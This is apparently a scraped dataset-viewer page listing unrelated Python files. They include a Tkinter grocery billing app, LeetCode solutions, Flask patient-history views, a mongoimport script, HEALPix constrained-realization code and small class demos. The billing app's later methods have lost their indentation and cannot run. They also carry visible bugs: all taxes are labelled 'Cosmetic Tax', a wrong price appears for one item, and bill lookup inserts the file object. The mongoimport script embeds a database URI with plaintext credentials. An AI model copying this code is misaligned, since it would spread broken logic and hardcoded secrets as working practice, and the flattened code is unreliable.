        """Compute line totals per item, category totals, 15% category taxes
        and the grand total; updates the StringVars shown in the bill menu.

        Side effects: sets self.c_*_p / g_*_p / d_*_p line totals (read later
        by bill_area), the three category totals, taxes and self.total_bill.
        """
        # Cosmetics: quantity * unit price per item
        self.c_s_p = self.soap.get() * 40.5
        self.c_fc_p = self.face_cream.get() * 120
        self.c_fw_p = self.face_wash.get() * 60
        self.c_hs_p = self.spray.get() * 180
        self.c_hg_p = self.gell.get() * 140
        self.c_bl_p = self.loshan.get() * 180
        self.total_cosmetic_price = float(
            self.c_s_p + self.c_fc_p + self.c_fw_p + self.c_hs_p + self.c_hg_p + self.c_bl_p)
        self.cosmetic_price.set("Tk. " + str(self.total_cosmetic_price))
        self.c_tax=round(self.total_cosmetic_price * 0.15)
        self.cosmetic_tax.set("Tk. " + str(self.c_tax))
        # Grocery
        self.g_r_p = self.rice.get() * 50
        self.g_f_p = self.food_oil.get() * 100
        self.g_d_p = self.daal.get() * 80
        self.g_w_p = self.wheat.get() * 240
        self.g_s_p = self.sugar.get() * 60
        self.g_t_p = self.tea.get() * 150
        self.total_Grocery_price = float(
            self.g_r_p + self.g_f_p + self.g_d_p + self.g_w_p + self.g_s_p + self.g_t_p)
        self.grocery_price.set("Tk. " + str(self.total_Grocery_price))
        self.g_tax=round(self.total_Grocery_price * 0.15)
        self.grocery_tax.set("Tk. " + str(self.g_tax))
        # Cold drinks
        self.d_m_p = self.maza.get() * 60
        self.d_c_p = self.cock.get() * 80
        self.d_f_p = self.frooti.get() * 70
        self.d_t_p = self.thumbsup.get() * 80
        self.d_l_p = self.limca.get() * 140
        self.d_s_p = self.sprite.get() * 80
        self.total_drinks_price = float(self.d_m_p + self.d_c_p + self.d_f_p + self.d_t_p + self.d_l_p + self.d_s_p)
        self.cold_drink_price.set("Tk. " + str(self.total_drinks_price))
        self.d_tax=round(self.total_drinks_price * 0.15)
        self.cold_drink_tax.set("Tk. " + str(self.d_tax))
        # Grand total = all categories + all taxes
        self.total_bill=float(self.total_cosmetic_price+
                              self.total_Grocery_price+
                              self.total_drinks_price+
                              self.c_tax+
                              self.g_tax+
                              self.d_tax )
def welcome_bill(self):
self.txtarea.delete('1.0', END)
self.txtarea.insert(END, "\tWelcome webcode Reatil\n")
self.txtarea.insert(END, f"\n Bill Number : {self.bill_no.get()}")
self.txtarea.insert(END, f"\nCustomer Name : {self.c_name.get()}")
self.txtarea.insert(END, f"\nPhone Number : {self.c_phon.get()}")
self.txtarea.insert(END, f"\n======================================")
self.txtarea.insert(END, f"\nProducts\t\tQTY\t\tPrice")
self.txtarea.insert(END, f"\n======================================")
def bill_area(self):
if self.c_name.get()=="" or self.c_phon.get()=="":
messagebox.showerror("Error ", "Customer details are must")
elif self.cosmetic_price.get()==" Tk. 0.0" and self.grocery_price.get()==" Tk. 0.0" and self.cold_drink_price.get()=="Tk. 0.0":
messagebox.showerror("Error","No Product Selected")
else:
self.welcome_bill()
# =======Cosmetics=====================
if self.soap.get() != 0:
self.txtarea.insert(END, f"\n Bath Soap\t\t{self.soap.get()}\t\t{self.c_s_p}")
if self.face_cream.get() != 0:
self.txtarea.insert(END, f"\n Face Cream\t\t{self.face_cream.get()}\t\t{self.c_fc_p}")
if self.face_wash.get() != 0:
self.txtarea.insert(END, f"\n Face Wash\t\t{self.face_wash.get()}\t\t{self.c_fw_p}")
if self.spray.get() != 0:
self.txtarea.insert(END, f"\n Hair Spray\t\t{self.spray.get()}\t\t{self.c_hs_p}")
if self.gell.get() != 0:
self.txtarea.insert(END, f"\n Gell\t\t{self.gell.get()}\t\t{self.c_hg_p}")
if self.loshan.get() != 0:
self.txtarea.insert(END, f"\n Loshan\t\t{self.loshan.get()}\t\t{self.c_s_p}")
# =============Grocery========================
if self.rice.get() != 0:
self.txtarea.insert(END, f"\n Rice\t\t{self.rice.get()}\t\t{self.g_r_p}")
if self.food_oil.get() != 0:
self.txtarea.insert(END, f"\n Food Oil\t\t{self.food_oil.get()}\t\t{self.g_f_p}")
if self.daal.get() != 0:
self.txtarea.insert(END, f"\n Daal\t\t{self.daal.get()}\t\t{self.g_d_p}")
if self.wheat.get() != 0:
self.txtarea.insert(END, f"\n Wheat\t\t{self.wheat.get()}\t\t{self.g_w_p}")
if self.sugar.get() != 0:
self.txtarea.insert(END, f"\n Sugar\t\t{self.sugar.get()}\t\t{self.g_s_p}")
if self.tea.get() != 0:
self.txtarea.insert(END, f"\n Tea\t\t{self.tea.get()}\t\t{self.g_t_p}")
# =========Cold Drinks=========================
if self.maza.get() != 0:
self.txtarea.insert(END, f"\n Coca-Cola\t\t{self.maza.get()}\t\t{self.d_m_p}")
if self.cock.get() != 0:
self.txtarea.insert(END, f"\n Red Bull\t\t{self.cock.get()}\t\t{self.d_c_p}")
if self.frooti.get() != 0:
self.txtarea.insert(END, f"\n Pepsi\t\t{self.frooti.get()}\t\t{self.d_f_p}")
if self.thumbsup.get() != 0:
self.txtarea.insert(END, f"\n Nescafe\t\t{self.thumbsup.get()}\t\t{self.d_t_p}")
if self.limca.get() != 0:
self.txtarea.insert(END, f"\nSprite \t\t{self.limca.get()}\t\t{self.d_l_p}")
if self.sprite.get() != 0:
self.txtarea.insert(END, f"\n Fanta\t\t{self.sprite.get()}\t\t{self.d_s_p}")
self.txtarea.insert(END, f"\n--------------------------------------")
if self.cosmetic_tax.get() != "Tk. 0.0":
self.txtarea.insert(END, f"\n Cosmetic Tax\t\t\t\t{self.cosmetic_tax.get()}")
if self.grocery_tax.get() != "Tk. 0.0":
self.txtarea.insert(END, f"\n Cosmetic Tax\t\t\t\t{self.grocery_tax.get()}")
if self.cold_drink_tax.get() != "Tk. 0.0":
self.txtarea.insert(END, f"\n Cosmetic Tax\t\t\t\t{self.cold_drink_tax.get()}")
self.txtarea.insert(END, f"\n--------------------------------------")
self.txtarea.insert(END, f"\n Total Bill : \t\t\t Tk. {self.total_bill}")
self.txtarea.insert(END, f"\n--------------------------------------")
self.save_bill()
def save_bill(self):
op=messagebox.askyesno("Save Bill ", "Do U want to save the Bill?")
if op>0:
self.bill_data=self.txtarea.get('1.0',END)
f1=open("bills/"+str(self.bill_no.get())+".txt","w")
f1.write(self.bill_data)
f1.close()
messagebox.showinfo("Saved",f"Bill no. :{self.bill_no.get()}" "\tBill saved Successfully")
else:
return
def find_bill(self):
present="no"
for i in os.listdir("bills/"):
if i.split('.')[0]==self.search_bill.get():
f1=open(f"bills/{i}","r")
self.txtarea.delete('1.0',END)
for d in f1:
self.txtarea.insert(END,f1)
f1.close()
present="yes"
#if present=="no":
# messagebox.showerror("Eroor","Invalid Bill No. ")
def clear_data(self):
op=messagebox.askyesno("Clear","Do u really want to clear?")
if op>0:
# ========Cosmetics==============================
self.soap.set(0)
self.face_cream.set(0)
self.face_wash.set(0)
self.spray.set(0)
self.gell.set(0)
self.loshan .set(0)
# =========Grocery================================
self.rice.set(0)
self.food_oil.set(0)
self.daal .set(0)
self.wheat .set(0)
self.sugar .set(0)
self.tea .set(0)
# =========Cold Drinks=============================
self.maza .set(0)
self.cock .set(0)
self.frooti .set(0)
self.thumbsup .set(0)
self.limca .set(0)
self.sprite .set(0)
# ============Total Product Price & Tax Variable
self.cosmetic_price .set("")
self.grocery_price .set("")
self.cold_drink_price .set("")
self.cosmetic_tax .set("")
self.grocery_tax .set("")
self.cold_drink_tax .set("")
# =========Customes==================================
self.c_name .set("")
self.c_phon .set("")
self.bill_no .set("")
x = random.randint(1000, 9999)
self.bill_no.set(str(x))
self.search_bill.set("")
self.welcome_bill()
def Exit_app(self):
op=messagebox.askyesno("Exit","Do U really want to exit?")
if op>0:
self.root.destroy()
# Run the GUI only when executed as a script, not when imported.
if __name__ == "__main__":
    root = Tk()
    obj = Bill_App(root)
    root.mainloop()
|
24,689 | d976b6b2e211b8c7f3707fc3ecd7107d3af41692 | # 方法一:蛮力法。
"""
先计算前面连续字符的长度,随后计算后面连续字符的长度
"""
class Solution:
    def countBinarySubstrings(self, s):
        """Brute force: for each start index, count one valid substring if the
        run beginning there is followed by an opposite run at least as long.

        A valid substring starting at i must consume the *entire* run starting
        at i (length a) and then exactly a characters of the opposite bit, so
        there is at most one valid substring per start index: it exists iff
        the following opposite run has length >= a.
        """
        result = 0
        for i in range(len(s)):
            first_length = 0
            second_length = 0
            j = i
            # Length of the run of s[i] starting at i.
            while j < len(s) and s[j] == s[i]:
                first_length += 1
                j += 1
            # Length of the immediately following opposite run.
            while j < len(s) and s[j] != s[i]:
                second_length += 1
                j += 1
            # BUG FIX: the original required exact equality and then broke out
            # of the *outer* loop after the first hit, so e.g. '00001111'
            # returned 1 instead of 4.  The correct condition is <= (the
            # opposite run only needs to be long enough), with no break.
            if first_length <= second_length:
                result += 1
        return result
# s = Solution()
# print(s.countBinarySubstrings('00001111'))
# 方法二:方法一其实还没用到问题背后的规律,本方法参考LeetCode他人评论
"""
先统计连续的0和1分别有多少个,如:111100011000,得到4323;在4323中的任意相邻两个数字,
取小的一个加起来,就是3+2+2 = 7.
"""
class Solution2:
    def countBinarySubstrings(self, s):
        """Run-length approach: collect the lengths of consecutive equal-char
        runs, then sum min(adjacent pair) over the run list.

        E.g. '111100011000' -> runs [4, 3, 2, 3] -> 3 + 2 + 2 = 7.
        """
        run_lengths = []
        current = 1
        for prev, ch in zip(s, s[1:]):
            if ch == prev:
                current += 1
            else:
                run_lengths.append(current)
                current = 1
        run_lengths.append(current)
        total = 0
        for a, b in zip(run_lengths, run_lengths[1:]):
            total += min(a, b)
        return total
# Demo run, guarded so importing this module does not print.
if __name__ == "__main__":
    s = Solution2()
    print(s.countBinarySubstrings('111100011000'))
|
24,690 | d2f15e562727c1bac7409ea1d59ae0ef8d4455ae | # app/historia_clinica/antecedentes_familiares/views.py
from flask import Flask, render_template, flash, request, url_for, redirect
from . import antecedentes_familiares
from ... import db
from ...paciente.views import get_paciente
from ...models import Antecedentes_familiares
app = Flask(__name__)
## FUNCION - OBTENER LOS ANTECEDENTES FAMILIARES DE UN PACIENTE EN PARTICULAR
def get_antecedentes_familiares(id):
    """Return the family-history record for patient *id*, or None."""
    return Antecedentes_familiares.query.filter_by(paciente_id=id).first()
## FUNCION - CREAR UNA INSTANCIA DE LOS ANTECEDENTES FAMILIARES DE UN PACIENTE
def create_antecedentes_familiares(diabetes,cardiaca,hipertension,sobrepeso,acv,cancer,observaciones,otro_tca,paciente_id):
    """Create, persist and return a family-history record for a patient."""
    record = Antecedentes_familiares(
        diabetes=diabetes,
        cardiaca=cardiaca,
        hipertension=hipertension,
        sobrepeso=sobrepeso,
        acv=acv,
        cancer=cancer,
        observaciones=observaciones,
        otro_tca=otro_tca,
        paciente_id=paciente_id,
    )
    db.session.add(record)
    db.session.commit()
    return record
## VISTAS - COMPLETAR LOS ANTECEDENTES FAMILIARES DE UN PACIENTE ##
@antecedentes_familiares.route('/antecedentes_familiares', methods=['GET', 'POST'])
def nuevo_antecedentes_familiares():
    """GET: render the family-history form.

    POST: persist the submitted family history for the patient and advance
    to the food-frequency step of the clinical history.
    """
    if request.method == 'POST':
        antecedentes_familiares = create_antecedentes_familiares(
            request.form['diabetes'],
            request.form['cardiaca'],
            request.form['hipertension'],
            request.form['sobrepeso'],
            request.form['acv'],
            request.form['cancer'],
            request.form['observaciones'],
            request.form['otro_tca'],
            request.form['id']
        )
        id_paciente = request.form['id']
        nombre_paciente = request.form['nombre_paciente']
        flash('Has agregado los antecedentes familiares de '+nombre_paciente+' de manera exitosa.')
        # Next step in the clinical-history workflow: food-frequency form.
        return render_template('historia_clinica/frecuencia_alimentos.html', id=id_paciente, nombre_paciente=nombre_paciente, title="Historia clinica")
    return render_template('historia_clinica/antecedentes_familiares.html', title='Antecedentes familiares')
## VISTAS - EDITAR LOS ANTECEDENTES FAMILIARES DE UN PACIENTE ##
@antecedentes_familiares.route('/edit_antecedentes_familiares/<int:id>', methods=['GET', 'POST'])
def edit_antecedentes_familiares(id):
    """Edit (or create, if missing) a patient's family-history record.

    GET renders the edit form; POST updates the existing record or creates a
    new one, then redirects back to the patient's clinical history.
    """
    antecedentes = Antecedentes_familiares.query.filter_by(paciente_id=id).first()
    if request.method == 'POST':
        # (the original re-ran the exact same query here; reuse the result)
        if antecedentes is None:
            create_antecedentes_familiares(
                request.form['diabetes'],
                request.form['cardiaca'],
                request.form['hipertension'],
                request.form['sobrepeso'],
                request.form['acv'],
                request.form['cancer'],
                request.form['observaciones'],
                request.form['otro_tca'],
                id
            )
        else:
            antecedentes.diabetes = request.form['diabetes']
            antecedentes.cardiaca = request.form['cardiaca']
            antecedentes.hipertension = request.form['hipertension']
            antecedentes.sobrepeso = request.form['sobrepeso']
            antecedentes.acv = request.form['acv']
            antecedentes.cancer = request.form['cancer']
            antecedentes.observaciones = request.form['observaciones']
            antecedentes.otro_tca = request.form['otro_tca']
            antecedentes.paciente_id = id
            db.session.commit()
        flash('Has editado los antecedentes familiares del paciente con éxito.')
        # BUG FIX: the create branch redirected to 'ver_historia_clinica'
        # without the blueprint prefix, unlike the update branch; both now use
        # the blueprint-qualified endpoint.
        return redirect(url_for('historia_clinica.ver_historia_clinica', id=id))
    paciente = get_paciente(id)
    return render_template('historia_clinica/edit_antecedentes_familiares.html', antecedentes_familiares=antecedentes, paciente=paciente, title='Editar antecedentes familiares')
24,691 | edd61c744ca35aba67295653836a8c562300c52b | from pymongo import MongoClient
import tkinter as tk
from tkinter import filedialog
import subprocess

# Create (and hide) an explicit root window instead of letting filedialog
# spawn a bare, visible one implicitly.
root = tk.Tk()
root.withdraw()

file = filedialog.askopenfilename()
# askopenfilename returns '' if the user cancels; don't run mongoimport then.
if file:
    # SECURITY/ROBUSTNESS FIX: the original interpolated the chosen path into
    # a shell=True f-string, which broke on paths with spaces and allowed
    # shell metacharacters in the filename to be executed. Pass an argument
    # list with the default shell=False instead.
    subprocess.run(
        [
            "mongoimport",
            "--uri", "mongodb+srv://user:user@promessededon.sw4vx.mongodb.net/OpenData_ORE",
            "--collection", "conso_annuel",
            "--jsonArray",
            "--file", file,
        ],
        check=False,
    )
|
24,692 | 4965de7007d783b3bcc0af3987e5b5e2c4cbdd1c | # messenger method (mm) constrained realizations
import numpy as np
import healpy as hp
import support_classes as sc
class ConstrainedRealizations:
    def __init__(self, nside, weights_map, lmax_factor=1.5, mask=None):
        """Constrained Realizations has to be initialized with parameters and
        the desired mask.

        nside: HEALPix resolution parameter, forwarded to sc.Parameters.
        weights_map: per-pixel weight map, stored for later transforms.
        lmax_factor: multiplier sc.Parameters uses to derive lmax.
        mask: optional sky mask; when None, an all-ones (unmasked) map is used.
        """
        self.params = sc.Parameters(nside, lmax_factor)
        self.weights_map = weights_map
        if mask is not None:
            self.mask = sc.Mask(mask, nside)
        else:
            # NOTE(review): this branch calls sc.Mask with a single argument
            # while the branch above passes (mask, nside) — confirm sc.Mask
            # accepts both signatures.
            self.mask = sc.Mask(np.ones(self.params.npix))
# set up methods
def set_noise_cov(self, noise_cov):
"""Set noise covariance matrix and calculate quantities for messenger
loop."""
self.check_nside(noise_cov)
self.noise_cov = sc.NoiseCov(noise_cov, self.mask.mask)
try:
self.set_delta()
except:
pass
def set_signal_cov(self, cl, fwhm = None):
"""Set signal cov from Cls and assignt quantities to .signal_cov
atribute"""
if fwhm is not None:
bl = hp.gauss_beam(fwhm,lmax=len(cl)-1)
self.signal_cov = sc.SignalCov(bl**2 * cl, self.params.lmax)
else:
self.signal_cov = sc.SignalCov(cl, self.params.lmax)
try:
self.set_delta()
except:
pass
def set_delta(self):
"""Set delta to generate random filed. Use gen_delta method to generate
delta"""
self.delta = sc.Delta(self.noise_cov.noise_cov, self.signal_cov.cl_inv,
self.mask.mask, self.params.pix_area)
def set_cooling_schedule(self, lamb_0, target_precision, eta=3/4):
"""Set initial parameters to obtain cooling schedule under atribute .cs.
"""
self.cs = sc.CoolingSchedule(lamb_0, eta)
self.cs.set_precision_schedule(target_precision)
# cooling methods/functions
def gen_delta(self):
"""Generate one fluctuation field delta making use of already set
parameters and covariances."""
delta = self.delta.gen_delta(self.mask.good_pix, self.mask.bad_pix,
self.params.nside, self.params.npix)
return delta
def solve_flm(self, tlm, delta, lamb, target_precision, wf = False):
"""Solve for flm for a specific delta, lambda and target precision"""
flm = np.ones(len(tlm))
while True:
flm_i = np.copy(flm)
flm, tlm = self.do_transform(delta, tlm, lamb, wf)
conv = np.linalg.norm(flm-flm_i, ord=2)\
/ np.linalg.norm(flm_i, ord=2)
if conv < target_precision:
return flm, tlm
def do_transform(self, delta, tlm, lamb, wf = False):
"""Do one iteration of the basis transform for the wiener filter"""
sl, tau, noise_cov = \
self.signal_cov.signal_cov, self.noise_cov.tau, \
self.noise_cov.noise_cov
good_pix, bad_pix = self.mask.good_pix, self.mask.bad_pix
weights_map = self.weights_map
pix_area, lmax, nside = self.params.pix_area, self.params.lmax, \
self.params.nside
if wf:
flm, tlm = \
wf_field_trnsfrm(delta, tlm, lamb, sl, tau, noise_cov, good_pix,
bad_pix, weights_map, pix_area, lmax, nside)
else:
flm, tlm = \
field_trnsfrm(delta, tlm, lamb, sl, tau, noise_cov, good_pix,
bad_pix, weights_map, pix_area, lmax, nside)
return flm, tlm
def gen_constrained_realization(self, delta_fix=None):
"""Generate one fluctation field, which added to a wiener filtered map
gives a constrained realization."""
# set up fields
if delta_fix is None:
delta = self.gen_delta()
else:
delta = delta_fix
t = np.copy(delta)
tlm = hp.map2alm(t*self.weights_map, self.params.lmax, iter=0)
# get cooling schedule
lamb_list = self.cs.lamb_list
eps_list = self.cs.eps_list
for i in range(len(lamb_list)):
flm, tlm = self.solve_flm(tlm, delta, lamb_list[i], eps_list[i])
return flm
def wiener_filter_data(self, data):
"""Outputs wiener filtered data in ell space, done with the messenger
method, given the input data."""
# set up fields
t = np.copy(data)
t[self.mask.bad_pix] = hp.UNSEEN
t[self.mask.good_pix] *= self.weights_map[self.mask.good_pix]
tlm = hp.map2alm(t, self.params.lmax, iter=0)
# get cooling schedule
lamb_list = self.cs.lamb_list
eps_list = self.cs.eps_list
for i in range(len(lamb_list)):
xlm, tlm = self.solve_flm(tlm, data, lamb_list[i], eps_list[i], wf = True)
return xlm
# helper functions
def check_nside(self, m):
assert hp.get_nside(m) == self.params.nside, \
"Wrong resolution, NSIDE should be {}.".format(self.params.nside)
def field_trnsfrm(delta, tlm, lamb, sl, tau, noise_cov, good_pix, bad_pix,
                  weights_map, pix_area, lmax, nside):
    """One messenger-method iteration for the fluctuation field: a
    harmonic-space Wiener step followed by the pixel-space messenger update.
    Returns the updated (flm, tlm)."""
    # Harmonic-space step: filter the messenger alms with the signal covariance.
    flm = sl * tlm / (sl + lamb * pix_area * tau)
    f = hp.alm2map(flm, nside, lmax, verbose=False)
    # Pixel-space step: rebuild the messenger field t.
    t = np.zeros(hp.nside2npix(nside))
    t[bad_pix] = lamb * tau * delta[bad_pix] + f[bad_pix]
    numer = (lamb * tau * noise_cov[good_pix] * delta[good_pix]
             + (noise_cov[good_pix] - tau) * f[good_pix])
    denom = noise_cov[good_pix] + (lamb - 1) * tau
    t[good_pix] = numer / denom
    # Back to harmonic space with the pixel weights applied.
    tlm = hp.map2alm(t * weights_map, lmax, iter=0)
    return flm, tlm
def wf_field_trnsfrm(data, tlm, lamb, sl, tau, noise_cov, good_pix, bad_pix,
                     weights_map, pix_area, lmax, nside):
    """One messenger-method iteration for Wiener filtering the data: a
    harmonic-space filter step followed by the pixel-space messenger update.
    Returns the updated (xlm, tlm)."""
    # Harmonic-space step: filter the messenger alms with the signal covariance.
    xlm = sl * tlm / (sl + lamb * pix_area * tau)
    x = hp.alm2map(xlm, nside, lmax, verbose=False)
    # Pixel-space step: rebuild the messenger field t from the data.
    t = np.zeros(hp.nside2npix(nside))
    t[bad_pix] = x[bad_pix]
    numer = (lamb * tau * data[good_pix]
             + (noise_cov[good_pix] - tau) * x[good_pix])
    denom = noise_cov[good_pix] + (lamb - 1) * tau
    t[good_pix] = numer / denom
    # Back to harmonic space with the pixel weights applied.
    tlm = hp.map2alm(t * weights_map, lmax, iter=0)
    return xlm, tlm
|
class Book():
    """A simple book with page navigation.

    Reading and paging only work while the book is open; the page counter
    is clamped to the valid range [0, pages_num].
    """

    def __init__(self, title, author, pages_num):
        self.title = title
        self.author = author
        self.pages_num = pages_num    # total number of pages
        self.current_page = 0         # 0 means the book has not been started
        self.is_open = False

    def open(self):
        """Open the book so it can be read and paged through."""
        self.is_open = True

    def close(self):
        """Close the book; paging and reading become no-ops."""
        self.is_open = False

    def read(self):
        """Print the current page (only while the book is open)."""
        if self.is_open:
            print('Czytasz stronę', self.current_page)

    def next_page(self):
        # Clamp at pages_num so the counter never points past the last page
        # (the original allowed it to grow without bound).
        if self.is_open and self.current_page < self.pages_num:
            self.current_page += 1

    def previous_page(self):
        # Clamp at 0 so the page number can never become negative
        # (the original allowed it to go below zero).
        if self.is_open and self.current_page > 0:
            self.current_page -= 1

    def book_status(self):
        """Print a summary of the book's metadata and reading position."""
        print(f'''
        Nazwa: {self.title}
        Autor: {self.author}
        Ilosc stron {self.pages_num}
        Biezaca strona {self.current_page}''')
|
24,694 | 41d1b45edda629a6b3e7319a8a20e0de7dece848 | import numpy as np
import os
import shutil
import re
# #############################################################################
# ############### Comandos de interés de Lectura ##############################
# #############################################################################
# Reading demo: extract the graph size from the header of a clique-instance
# file. The `with` block closes the file automatically.
with open('MANN_a9.clq.txt', 'r') as archivo:
    # Read one line | linea[0] is its first character.
    linea = archivo.readline()
    # Locate the line containing the desired substring.
    re.search('Graph Size:', linea)
    # Strip trailing whitespace/newline. (Fixed: the original called
    # `line.rstrip()` on an undefined name `line`.)
    linea = linea.rstrip()
    # Extract every integer token via a regular expression (raw string).
    re.findall(r'[0-9]+', linea)
    # Split the line on a separator character; keep the string in `linea`
    # intact by binding the fields to a new name.
    partes = linea.split(',')
    # Keep only the digits of the first field (raw string avoids the
    # invalid-escape warning of "\D").
    size = int(re.sub(r"\D", "", partes[0]))
# #############################################################################
# ############### Comandos de interés de Escritura ############################
# #############################################################################
# In this file we have the methods to parse the input file
def savePFile(filename, sol):
    """Write a solution to `filename`.

    `sol` is a pair (value, splits): the first line written is str(value);
    each subsequent line holds the four coordinates of one split as
    "x1 y1 x2 y2", where a split is a pair of 2-tuples.
    """
    # Ensure the parent directory exists. (The original created a directory
    # *named* `filename` and immediately rmtree'd it — which crashed when the
    # target already existed as a regular file.)
    parent = os.path.dirname(filename)
    if parent:
        os.makedirs(parent, exist_ok=True)
    # Context manager guarantees the handle is closed and flushed
    # (the original leaked the open file).
    with open(filename, "w") as f:
        f.write(str(sol[0]) + '\n')
        for split in sol[1]:
            f.write(str(split[0][0]) + ' ' + str(split[0][1]) + ' '
                    + str(split[1][0]) + ' ' + str(split[1][1]) + '\n')
|
24,695 | 9edf606bb842349580dfe8fe72134986911a7133 | from braces.views import SelectRelatedMixin
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.models import User
from django.views import generic
class Details(LoginRequiredMixin, SelectRelatedMixin, generic.ListView):
    """Settings page listing users for the authenticated account.

    Requires login; `select_related` prefetches each user's profile.
    """
    # Bug fix: `model` must be a model class, not the string 'user'.
    model = User
    select_related = ('profile', )
    template_name = 'ams/settings/setting.html'

    def get_object(self, queryset=None):
        """Return the user making the request."""
        return self.request.user

    def get_queryset(self):
        """All users shown on the settings page."""
        return User.objects.all()
class AllUsers(LoginRequiredMixin, generic.DetailView):
    """Detail view over the full user table; requires an authenticated session.
    NOTE(review): relies on DetailView's default object lookup (pk/slug from
    the URLconf) since get_object is not overridden — confirm the route
    supplies one of those kwargs.
    """
    template_name = 'ams/settings/setting.html'
    def get_queryset(self):
        # Base queryset from which DetailView resolves the single object.
        return User.objects.all()
|
# Demo of list indexing and slicing on a mixed-type list.
friends = ["vinayak", "shubham", "gopal", "sagar", 5]
numbers = [10, 30, 20, '50,40']

print(friends)        # the whole list
print(friends[2])     # a single element by index
print(friends[0:4])   # slice: first four elements
for _ in range(3):    # the same element printed three more times
    print(friends[2])
|
24,697 | 7f09f7f1ac911d04ba74cd702933b21ff6fed2be | from threading import Thread, Event
import time
from queue import Queue
class LerMensagens(Thread):
    """Background thread that polls the chat history DOM for new messages
    and forwards commands prefixed with '!XTO ' to a consumer.

    evento -- threading.Event set whenever a command is queued.
    infos  -- queue.Queue receiving the tokenised command.
    driver -- selenium WebDriver pointed at the chat page.
    """

    # Sub-commands this reader recognises after the '!XTO ' prefix.
    COMANDOS = ("PLAY", "SKIP", "EXIT", "LISTA", "HELP")

    def __init__(self, evento, infos, driver):
        Thread.__init__(self)
        self.sair = 0
        self.infos_uteis = infos
        self.evento = evento
        self.driver = driver

    def run(self):
        # Number of messages already seen; only newer ones are processed.
        tam = 0
        while True:
            time.sleep(0.4)
            msgs = self.driver.find_elements_by_xpath('//div[@id="chat-history-container"]/ul/li')
            if tam < len(msgs):
                tam = len(msgs)
                # Second <p> of the newest message holds the message text.
                p = msgs[len(msgs)-1].find_elements_by_tag_name('p')
                if p[1].text.upper().startswith('!XTO '):
                    # Drop the '!XTO' prefix and rebuild the command string.
                    menu = p[1].text.split(" ")
                    del(menu[0])
                    menu_string = " ".join(menu)
                    # All recognised commands were handled identically, so the
                    # five duplicated elif branches collapse into one check:
                    # str.startswith accepts a tuple of prefixes.
                    if menu_string.upper().startswith(self.COMANDOS):
                        opcao = menu_string.split(" ")
                        self.infos_uteis.put(opcao)
                        self.evento.set()
|
24,698 | 0c82940ae09bc97baf7e9c58f9faaf75d785458a |
# List-mutation walkthrough: growing, shrinking and replacing elements.
classmates = ['Michael', 'Bob', 'Tracy']

len(classmates)     # number of elements
classmates[0]       # first element
classmates[-1]      # last element

classmates += ['Adam']        # append at the end
classmates.insert(1, 'Jack')  # insert before index 1
del classmates[-1]            # drop the last element
classmates.pop(1)             # remove the element at index 1
classmates[1] = 'Sarah'       # replace by index

L = ['Apple', 123, True]      # a list may mix element types
s = ['python', 'java', ['asp', 'php'], 'scheme']
len(s)                        # a nested list counts as one element
|
24,699 | 57f13e8be4924f96b19f8ccd113b9d8295e5a142 |
class Levenshtein():
    """Edit distance between two sequences via dynamic programming."""

    def __init__(self, p1, p2):
        self.p1 = p1
        self.p2 = p2

    def distance(self):
        """Return the Levenshtein distance between p1 and p2."""
        cols = len(self.p1) + 1
        rows = len(self.p2) + 1
        # dp[j][i] = distance between p1[:i] and p2[:j]; the first row and
        # column hold the cost of building a prefix from the empty string.
        dp = [[0] * cols for _ in range(rows)]
        for i in range(cols):
            dp[0][i] = i
        for j in range(rows):
            dp[j][0] = j
        for j in range(1, rows):
            for i in range(1, cols):
                subst = dp[j - 1][i - 1] + (self.p1[i - 1] != self.p2[j - 1])
                dp[j][i] = min(subst, dp[j][i - 1] + 1, dp[j - 1][i] + 1)
        return dp[-1][-1]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.